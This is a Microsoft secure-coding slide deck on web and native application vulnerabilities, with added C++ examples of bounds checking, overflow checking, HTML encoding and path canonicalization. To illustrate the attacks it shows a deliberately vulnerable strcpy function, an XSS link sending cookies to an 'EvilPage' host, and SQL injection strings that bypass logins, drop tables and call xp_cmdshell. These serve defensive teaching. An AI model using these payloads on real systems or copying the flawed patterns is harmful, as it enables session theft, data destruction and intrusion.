Managing Risk: Application Development Principles and Best Practices Dave Glover Microsoft Pty Ltd http://blogs.msdn.com/dglover
The Gartner Group states: "Today over 70% of attacks against a company's Web site or Web application come at the 'Application Layer' not the Network or System layer."
Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally
Buffer Overruns • Occurs when data exceeds the expected size and overwrites other values • Exists primarily in unmanaged C/C++ code • Includes four types: • Stack-based • Heap overruns • V-table and function pointer overwrites • Exception handler overwrites • Can be exploited by worms and can result in: • Access Violation (Denial of Service) • Instability • Code Injection
How Stack-Based Buffer Overruns Work
#include <string.h>
/* 10-byte stack buffer, unbounded copy: any argument of 10 or more characters
   (the terminator needs a byte too) is written past the end of buffer, over
   the saved frame pointer and return address */
void flawed(char * str) { char buffer[10]; strcpy(buffer, str); }
int main(void) { flawed("This string is too long"); return 0; }
Defending Against Buffer Overruns • Avoid the error-prone string and buffer functions… • strcpy, strncpy (does not guarantee a terminating NUL), CopyMemory, MultiByteToWideChar (buffer size is in characters, not bytes), … • Use strsafe.h (StringCchCopy and friends, which always terminate and report truncation) for safer buffer handling • Use the /GS compile option in Visual C++ .NET (a run-time mitigation that detects some stack overruns after the fact; it is not a substitute for bounds checks) • Check all array indexes • Use recognized file-path processing methods, such as _splitpath (C runtime) • Use managed code • But pay attention to PInvoke and COM Interop: the native code on the other side still has its bugs
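An added example, not code from the deck: the flawed strcpy() pattern from the previous slide next to a bounded copy that always terminates the destination and reports whether the input fit, the same contract as StringCchCopy() in strsafe.h. The third function shows why strncpy() is on the avoid list. Function names and the 10-byte buffer size are assumptions for illustration.

```cpp
// Added example (not from the original deck): flawed copy beside a bounded copy.
#include <cstddef>
#include <cstring>

// Vulnerable form from the slide: no length check, 10-byte stack buffer.
// Any argument of 10 or more characters overruns the buffer (undefined behaviour).
void flawed(const char *str) {
    char buffer[10];
    strcpy(buffer, str);  // writes strlen(str)+1 bytes regardless of sizeof(buffer)
}

// Hardened form: copy at most dst_size-1 bytes, always NUL-terminate, and
// tell the caller whether the whole input fit. The destination is a valid
// C string on every return path, including failure.
bool safe_copy(char *dst, size_t dst_size, const char *src) {
    if (dst == nullptr || dst_size == 0 || src == nullptr) return false;
    size_t n = strlen(src);
    if (n >= dst_size) {
        // Too long: truncate and report. The caller decides whether to reject.
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return false;
    }
    memcpy(dst, src, n + 1);  // n bytes plus the terminator
    return true;
}

// Why strncpy() is on the "avoid" list: with a source of dst_size or more
// characters it fills the buffer completely and writes no terminating NUL,
// so a later strlen()/printf() reads past the end. Returns true only if
// the result is still a terminated string.
bool strncpy_leaves_terminator(char *dst, size_t dst_size, const char *src) {
    strncpy(dst, src, dst_size);
    return memchr(dst, '\0', dst_size) != nullptr;
}

// Hypothetical request handler: reject over-long input instead of
// silently truncating it (truncation can itself change meaning, e.g. of a path).
bool handle(const char *untrusted) {
    char buffer[10];
    if (!safe_copy(buffer, sizeof buffer, untrusted)) {
        return false;  // input did not fit: refuse the request
    }
    // ... use buffer ...
    return true;
}
```

safe_copy() follows the strsafe.h convention of reporting truncation rather than hiding it; whether to truncate or reject is an application decision, but it must be an explicit one.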
Arithmetic Errors • Occur when the limits of a variable's data type are exceeded and the value silently wraps around • Lead to serious runtime issues (wrong totals, undersized allocations, bypassed checks) • Are often overlooked and underestimated • Include: • Overflow – value too large for the data type • Underflow – value below the minimum of the data type (e.g. subtracting from 0 in an unsigned type wraps to a huge positive number)
Demo: Arithmetic Overflow (CalEngine, Purchase.aspx, GoodPurchase.aspx)
Defending Against Arithmetic Errors • Understand the limitations of each data type • Unit test boundary conditions (maximum, minimum, zero, negative) • Consider writing safe, reusable functions that check before they compute • Consider using a safe template class (if coding in C++) • Use languages that support overflow checking: VB.NET checks integer overflow by default; C# does so inside a checked block or with the /checked compiler option (it is unchecked by default)
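An added example, not from the deck and not Microsoft's SafeInt: a minimal checked-arithmetic template in the spirit of the "safe template class" the slide recommends, applied to the Purchase demo's idea of quantity times unit price. Each operation reports overflow instead of wrapping. The Checked name, the order_total_cents() function and the sample prices are assumptions for illustration.

```cpp
// Added example (not from the original deck): checked integer arithmetic.
#include <cstdint>
#include <limits>
#include <type_traits>

template <typename T>
struct Checked {
    static_assert(std::is_integral<T>::value, "integral types only");

    // a + b, or false if the result cannot be represented in T.
    // The comparisons are arranged so that no intermediate expression overflows.
    static bool add(T a, T b, T *out) {
        if (b > 0 && a > std::numeric_limits<T>::max() - b) return false;
        if (b < 0 && a < std::numeric_limits<T>::min() - b) return false;
        *out = static_cast<T>(a + b);
        return true;
    }

    // a * b with the same contract. Divides the limits instead of
    // performing the possibly-overflowing multiply first.
    static bool mul(T a, T b, T *out) {
        if (a == 0 || b == 0) { *out = 0; return true; }
        const T maxv = std::numeric_limits<T>::max();
        const T minv = std::numeric_limits<T>::min();
        if (a > 0) {
            if (b > 0) { if (a > maxv / b) return false; }
            else       { if (b < minv / a) return false; }
        } else {
            if (b > 0) { if (a < minv / b) return false; }
            else       { if (b < maxv / a) return false; }  // both negative: product positive
        }
        *out = static_cast<T>(a * b);
        return true;
    }
};

// The Purchase.aspx scenario: quantity * unit price in 32-bit cents.
// Returns true and the total, or false if the inputs are nonsense or the
// multiplication overflowed (assumed business rule: reject, do not clamp).
bool order_total_cents(int32_t quantity, int32_t unit_price_cents, int32_t *total) {
    if (quantity <= 0 || unit_price_cents <= 0) return false;
    return Checked<int32_t>::mul(quantity, unit_price_cents, total);
}

// What the unchecked code does: the product wraps modulo 2^32 and the
// customer is billed a plausible-looking but wrong amount.
int32_t unchecked_total_cents(int32_t quantity, int32_t unit_price_cents) {
    return static_cast<int32_t>(static_cast<uint32_t>(quantity) *
                                static_cast<uint32_t>(unit_price_cents));
}
```

The unsigned instantiation works with the same code: the `b < 0` branches are simply never taken. In C#, the equivalent of Checked::mul is `checked(quantity * unitPrice)`, which throws OverflowException instead of returning false.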
Cross-Site Scripting • Malicious script is sent to a Web application as input • Echoed back to a user's browser, where it is executed with the privileges of your site's origin • Targets your users; your application is the vehicle • Reflected attacks arrive via carefully crafted hyperlinks; stored attacks come from content the application saved earlier (reviews, profiles) • Allows hackers to: • Execute malicious script in a client's Web browser • Insert <script>, <object>, <applet>, <form>, and <embed> tags • Steal Web session information and cookies (including authentication cookies) • Act on the site as the victim and reach whatever the client's browser can reach
How Cross-Site Scripting Works
URL points to the site that the hacker wants to attack:
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">…</a>
The query string contains embedded JavaScript that redirects to the hacker's page and transmits any cookies issued by the site hosting Search.aspx in a query string.
What Is a One-Click Attack (today usually called cross-site request forgery, CSRF) • Site offers a persistent sign-in option (cookies) • Victim user navigates to (or opens) an HTML page the attacker controls – perhaps a "once in a lifetime offer" • One or more actions are carried out on the site using the trust of the victim user, who is completely unsuspecting, because the browser attaches the site's cookies to the forged request
Demo: Cross Site Script Attacks (Search.aspx, Review.aspx, AntiXSS Library, Secure Controls, GoodSearch.aspx, Validation Controls, Secure Frames, One Click Attack)
Defending Against Cross-Site Scripting Attacks • Do not • Trust user input • Echo client-supplied data without encoding • Store secret information in cookies • Do • Take advantage of ASP.NET’s validateRequest • Take advantage of ASP.NET’s ViewStateUserKey • Consider AntiXSS for data encoding • Use the HttpOnly cookie option • Use the <frame> security attribute • Implement Secure Custom Controls
Defending Against XSS • Input validation – first line of defense • OK: principle of exclusions, or black-listing (reject known-bad patterns) • Better: principle of inclusions, or white-listing (accept only known-good characters and formats) • Output encoding – the control that actually stops the script from running • Platform features: Server.HtmlEncode() • Use Anti-XSS (Microsoft.Security.Application.AntiXss), which encodes by inclusion: everything outside a small safe set is encoded
Context: non-persistent (reflected) XSS. The product search feature of WIDGETCO displays the 'searchstring' input without validating or encoding it:
Bad code: someLabel.Text = "Results for " + searchstring + ":";
Mitigation using Anti-XSS: someLabel.Text = "Results for " + AntiXss.HtmlEncode(searchstring) + ":";
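An added example, not the deck's code and not the Anti-XSS library's implementation: output encoding by the principle of inclusions described above. Only characters in a small allow-list pass through unchanged; every other ASCII byte becomes a numeric character reference, so the browser can never interpret the data as markup. The WIDGETCO label builder is reproduced in C++ to show the bad and good forms side by side; the function names and the assumption that the page is served as UTF-8 are mine.

```cpp
// Added example (not from the original deck): allow-list HTML encoding.
#include <cstdio>
#include <string>

// Principle of inclusions: these ASCII characters are known to be harmless
// in an HTML text node. Bytes >= 0x80 are UTF-8 continuation/lead bytes of
// non-ASCII text; they cannot form markup, so they pass through and the
// multi-byte sequence stays intact (assumes the page is emitted as UTF-8).
static bool is_safe_char(unsigned char c) {
    if (c >= 0x80) return true;
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == ' ' || c == '.' ||
           c == ',' || c == '-' || c == '_';
}

// Everything not in the allow-list is emitted as &#NNN; (decimal), which
// covers < > & " ' / and control characters without a per-character table.
std::string html_encode(const std::string &untrusted) {
    std::string out;
    out.reserve(untrusted.size());
    for (unsigned char c : untrusted) {
        if (is_safe_char(c)) {
            out.push_back(static_cast<char>(c));
        } else {
            char buf[16];
            std::snprintf(buf, sizeof buf, "&#%u;", static_cast<unsigned>(c));
            out += buf;
        }
    }
    return out;
}

// The slide's "Bad code" line: user input concatenated straight into markup.
std::string results_label_bad(const std::string &searchstring) {
    return "Results for " + searchstring + ":";
}

// The mitigated line: encode at the point of output, in the HTML context.
std::string results_label_good(const std::string &searchstring) {
    return "Results for " + html_encode(searchstring) + ":";
}

// Check used by the tests below: does the rendered label still contain
// a raw tag opener that the browser would parse as markup?
bool contains_raw_tag(const std::string &html) {
    return html.find('<') != std::string::npos;
}
```

Encoding is context-specific: this encoder is for an HTML text node. Data placed inside a JavaScript string, a URL or an attribute needs the encoding for that context, which is why the Anti-XSS library ships JavaScriptEncode and UrlEncode alongside HtmlEncode.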
Defending Against One-Click Attack • The browser's cross-frame (same-origin) security limits this to a "write-only" attack: the attacker can cause the request but cannot read the response • Concept for defense: require a data element in the request which the attacker can't supply • Check the Referer header (a weak check on its own: browsers and proxies may strip it) • In .NET 1.1 use ViewStateUserKey, set during page initialisation before view state is loaded, so a view state captured for one user fails the MAC check when replayed for another:
override protected void OnInit(EventArgs e) { // ... ViewStateUserKey = User.Identity.Name; base.OnInit(e); // ... }
SQL Injection • Adds SQL statements to user input to: • Probe databases, execute multiple SQL statements • Bypass authorization • Call built-in stored procedures • Exploits applications that don’t validate input • Input from <form> fields, query strings, cookies
How SQL Injection Works
Model query: SELECT COUNT(*) FROM Users WHERE UserName='Jeff' AND Password='imbatman'
Malicious query: SELECT COUNT(*) FROM Users WHERE UserName='' or 1=1-- AND Password=''
"or 1=1" matches every record in the table; "--" comments out the remainder of the query, so the password is never checked
Examples Of SQL Injection • If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following: • ALFKI1001 • ALFKI1001' or 1=1 -- • ALFKI1001'; DROP TABLE OrderDetail -- • ALFKI1001'; exec xp_cmdshell('fdisk.exe') -- • The vulnerable pattern: the input becomes part of the SQL text itself
sqlString = String.Format("select count(*) from customers where username='{0}' and password='{1}'", userName, password);
Demo: SQL Injection Attack (Login Attack, Search Page Attack, SQL Cmd Shell Attack)
Defending Against SQL Injection • Code against SQL injection attacks • Validate all input (type, length, format, range) • Don't build SQL commands by string concatenation • Use parameterized commands (SqlParameter), which keep data out of the SQL text; stored procedures help only if they do not build dynamic SQL internally • Run with least privilege • Never execute as "sa" • Restrict access to built-in stored procedures (xp_cmdshell and friends) • Store connection strings securely • Integrated security is better than embedded passwords • Encrypt the Web.config connectionStrings section • DPAPI or the Configuration Application Block • Do not echo database errors to the user (fail intelligently, log the detail server-side) • Apply administrative protections to SQL Server http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
[Diagram: Plaintext + Key → Algorithm → Ciphertext]
Cryptography Weaknesses • Inappropriate use of algorithms • Creating your own • Using weak ones • Incorrect application • Failure to keep keys secure • Insecure storage • Extensive duration of use • The human factor • Accidental release of private keys
"I need three of the above to decrypt your data!"
Defending Against Cryptography Weaknesses • Rotate keys periodically, so no key stays in use long enough to be worth attacking • Use ACLs to restrict access to keys • Store keys on an external device (smart card or hardware security module) so the private key never sits on the Web server's disk • Use key sizes that match the required protection period • Use DPAPI to simplify key management, if possible • Do not implement your own cryptographic routines; use the platform's tested implementations
Hidden-Field Tampering • Exploits applications that persist data between requests by round-tripping it in hidden <input> fields • The technique • Look for <input type="hidden" … > tags • Submit bogus requests with modified value attributes so the server acts on values it never sent • Defense: treat a hidden field like any other client input; never carry trust-sensitive values (prices, roles, IDs of other users) in it without recomputing or looking them up server-side
How Hidden-Field Tampering Works
Page contains this: <input type="hidden" id="price" value="10000.00">
Postback data should contain this: price="10000.00"
Instead it contains this: price="1.00"
Canonicalization Issues • There is usually more than one way to name something • Alternate representations exist for: • File names • URLs • Devices (such as printers) • Hackers may exploit code that makes decisions based on file names or URLs
Defending Against Canonicalization Issues • Use file-system security to restrict access to private data, so a bad path decision is not the only barrier • Never make a security decision based on a name until it has been decoded and canonicalized • Disable the IIS Parent Paths setting (it allows ".." in ASP include paths) • Encrypt Web.config sections so a traversal that reaches the file does not expose connection strings
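An added example, not the deck's code: a canonicalizer for a request-supplied relative path of the kind ViewImage.aspx would take. It percent-decodes once, treats backslash like slash, collapses "." and "..", refuses anything that is still encoded or contains a NUL, and only then checks that the result stays under the allowed prefix. The function names, the "images/" root and the sample inputs are assumptions for illustration.

```cpp
// Added example (not from the original deck): canonicalize before deciding.
#include <cctype>
#include <string>
#include <vector>

// One round of %XX decoding. Invalid escapes are left as-is so that the
// caller can spot them: a '%' surviving the decode means ambiguous input.
static std::string percent_decode(const std::string &s) {
    std::string out;
    for (size_t i = 0; i < s.size(); ++i) {
        if (s[i] == '%' && i + 2 < s.size() &&
            std::isxdigit(static_cast<unsigned char>(s[i + 1])) &&
            std::isxdigit(static_cast<unsigned char>(s[i + 2]))) {
            out.push_back(static_cast<char>(std::stoi(s.substr(i + 1, 2), nullptr, 16)));
            i += 2;
        } else {
            out.push_back(s[i]);
        }
    }
    return out;
}

// Returns true and the canonical relative path, or false if the request
// must be rejected. allowed_prefix is the canonical directory the caller
// is willing to serve from, e.g. "images/".
bool canonicalize_under_root(const std::string &request,
                             const std::string &allowed_prefix,
                             std::string *canonical) {
    std::string p = percent_decode(request);
    // Double encoding ("%252e") leaves a '%' behind; an embedded NUL would
    // truncate the name in a C API later. Both are rejected outright.
    if (p.find('%') != std::string::npos || p.find('\0') != std::string::npos) return false;
    for (char &c : p) if (c == '\\') c = '/';   // Windows accepts both separators

    std::vector<std::string> parts;
    size_t start = 0;
    while (start <= p.size()) {
        size_t end = p.find('/', start);
        if (end == std::string::npos) end = p.size();
        std::string seg = p.substr(start, end - start);
        if (seg.empty() || seg == ".") {
            // "//" and "/./" add nothing
        } else if (seg == "..") {
            if (parts.empty()) return false;    // would climb above the root
            parts.pop_back();
        } else {
            parts.push_back(seg);
        }
        start = end + 1;
    }
    if (parts.empty()) return false;

    std::string out;
    for (size_t i = 0; i < parts.size(); ++i) {
        if (i) out += '/';
        out += parts[i];
    }
    // The decision is made on the canonical form only.
    if (out.compare(0, allowed_prefix.size(), allowed_prefix) != 0) return false;
    *canonical = out;
    return true;
}
```

This handles the representations the slide lists (encoding, separators, dot segments) but is lexical: on Windows the file system adds more aliases, such as trailing dots and spaces, 8.3 short names and NTFS stream suffixes (name::$DATA), so the file-system ACL from the previous slide remains the backstop.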
Encrypting Web.config sections • aspnet_regiis -pc "SampleKeys" -exp (create an exportable RSA key container) • aspnet_regiis -pa "SampleKeys" "domain\acct" (grant the application's account access to the container) • aspnet_regiis -pef connectionStrings . (encrypt the connectionStrings section of the Web.config in the current directory) • aspnet_regiis -pdf connectionStrings . (decrypt it again) • Web.config:
<configProtectedData defaultProvider="SampleProvider">
  <providers>
    <add name="SampleProvider"
         type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL"
         keyContainerName="SampleKeys"
         useMachineContainer="true" />
  </providers>
</configProtectedData>
Demo: Traversal Attacks (PathTraversal.htm, ViewImage.aspx, GoodProducts.aspx, Web.Config Encryption)
Next Steps • Stay informed about security • Microsoft Developers Network Security Center • http://msdn.microsoft.com/security/ • Microsoft Security Guidance • http://www.microsoft.com/security/guidance/ • Get additional security training • Find online and in-person training seminars: • http://www.microsoft.com/seminar/events/security/ • Read the book: Writing Secure Code • Michael Howard and David LeBlanc • ISBN: 0-7356-1722-8
Defending Against the Others • Improving Web Application Security • Threats and Countermeasures • http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp
Security seminar follow up… • Security e-forum site: www.microsoft.com.au/eforum • View on-demand web casts of all presentations from this event (tell your work colleagues!) • Online live chats • Have a live chat with the Microsoft security experts you'll see today. Check the e-forum site for the live chat schedule. • Plus lots more… • Evaluation forms - we value your feedback! • Need help with your business' security? • Q7 - register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your security challenges • Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360